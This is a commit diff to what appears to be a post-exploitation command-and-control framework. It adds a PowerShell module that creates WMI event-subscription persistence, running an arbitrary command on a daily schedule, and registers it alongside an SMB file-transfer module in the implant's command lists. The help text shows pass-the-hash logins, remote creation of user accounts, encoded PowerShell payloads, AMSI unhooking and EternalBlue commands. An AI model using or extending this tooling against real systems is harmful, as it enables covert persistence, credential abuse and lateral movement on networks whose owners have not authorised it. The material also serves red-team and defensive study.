'Added WMIEvents and Incorporated Invoke-SMBClient'

AutoLoads.py

@@ -87,6 +87,7 @@ def run_autoloads(command, randomuri):
   if "invoke-reversednslookup" in command.lower(): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri)
   if "invoke-runas" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri)
   if "invoke-smblogin" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
+  if "invoke-smbclient" in command.lower(): check_module_loaded("Invoke-SMBClient.ps1", randomuri)
   if "invoke-smbexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
   if "invoke-psexec" in command.lower(): check_module_loaded("Invoke-SMBExec.ps1", randomuri)
   if "invoke-shellcode" in command.lower(): check_module_loaded("Invoke-Shellcode.ps1", randomuri)
@@ -97,7 +98,6 @@ def run_autoloads(command, randomuri):
   if "invoke-tokenmanipulation" in command.lower(): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri)
   if "invoke-wmichecker" in command.lower(): check_module_loaded("Invoke-WMIChecker.ps1", randomuri)
   if "invoke-wmicommand" in command.lower(): check_module_loaded("Invoke-WMICommand.ps1", randomuri)
-  if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri)
   if "invoke-wscriptbypassuac" in command.lower(): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri)
   if "invoke-winrmsession" in command.lower(): check_module_loaded("Invoke-WinRMSession.ps1", randomuri)
   if "out-minidump" in command.lower(): check_module_loaded("Out-Minidump.ps1", randomuri)
@@ -129,4 +129,8 @@ def run_autoloads(command, randomuri):
   if "invoke-mapdomaintrust" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
   if "get-wmireglastloggedon" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
   if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
-  if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
+  if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
+  if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)  
+  if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri)
+  

Help.py

@@ -109,12 +109,16 @@ installexe-persistence
 removeexe-persistence
 install-servicelevel-persistence | remove-servicelevel-persistence
 install-servicelevel-persistencewithproxy | remove-servicelevel-persistence
+invoke-wmievent -name backup -command "powershell -enc abc" -hour 10 -minute 30
+get-wmievent
+remove-wmievent -name backup
 
 Network Tasks / Lateral Movement:
 ==================
 get-externalip
 test-adcredential -domain test -user ben -password password1
 invoke-smblogin -target 192.168.100.20 -domain testdomain -username test -hash/-password
+invoke-smbclient -Action Put -source c:\\temp\\test.doc -destination \\test.com\\c$\\temp\\test.doc -hash
 invoke-smbexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
 invoke-wmiexec -target 192.168.100.20 -domain testdomain -username test -hash/-pass -command "net user smbexec winter2017 /add"
 net view | net users | net localgroup administrators | net accounts /dom
@@ -328,7 +332,8 @@ COMMANDS = ['loadmodule',"bloodhound","brute-ad","brute-locadmin",
 "install-servicelevel-persistence","remove-servicelevel-persistence","reversedns",
 "invoke-eternalblue","loadmoduleforce","unhook-amsi","get-implantworkingdirectory","get-system",
 "get-system-withproxy","get-system-withdaisy","get-pid","listmodules","modulesloaded",
-"startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence","resolve-ipaddress"]
+"startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence",
+"resolve-ipaddress","invoke-wmievent","remove-wmievent","get-wmievent","invoke-smbclient"]
 
 COMMANDS += ['invoke-psexecpayload','invoke-wmipayload', 'invoke-dcompayload']
 COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomproxypayload']

Modules/Invoke-WMIEvent.ps1

@@ -0,0 +1,62 @@
+<#
+.Synopsis
+    Invoke-WMIEvent
+    https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
+Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
+Backdoor-wp.pdf
+
+.DESCRIPTION
+	PS C:\> Usage: Invoke-WMIEvent -Name <Name> -Command <Command> -Hour <Hour> -Minute <Minute>
+.EXAMPLE
+    PS C:\> Get-WMIEvent
+.EXAMPLE
+    PS C:\> Invoke-WMIEvent -Name Backup -Command "powershell -enc abc" -Hour 10 -Minute 30
+.EXAMPLE
+    PS C:\> Remove-WMIEvent -Name Backup
+#>
+Function Invoke-WMIEvent 
+{
+
+    Param
+    (
+        [Parameter(Mandatory=$true)][string]
+        $Name,
+        [Parameter(Mandatory=$true)][string]
+        $Command,
+        [string]
+        $Hour=9,
+        [string]
+        $Minute=30
+    )
+
+    $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name="$Name";EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $Hour AND TargetInstance.Minute = $Minute GROUP WITHIN 60"}; 
+
+    $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name="$Name";CommandLineTemplate="$Command";RunInteractively='false'}; 
+
+    Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} 
+
+    Write-Output ""
+    Write-Output "[+] WMIEvent added: $Name for $Hour:$Minute"
+    Write-Output "[+] Command: $Command"
+    Write-Output ""
+}
+
+Function Remove-WMIEvent 
+{
+
+    Param
+    (
+        [Parameter(Mandatory=$true)][string]
+        $Name
+    )
+
+    Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -Filter "name='$Name'" | Remove-WmiObject 
+
+    Write-Output ""
+    Write-Output "[+] WMIEvent removed: $Name"
+    Write-Output ""
+}
+Function Get-WMIEvent
+{
+	gwmi CommandLineEventConsumer -Namespace root\subscription
+}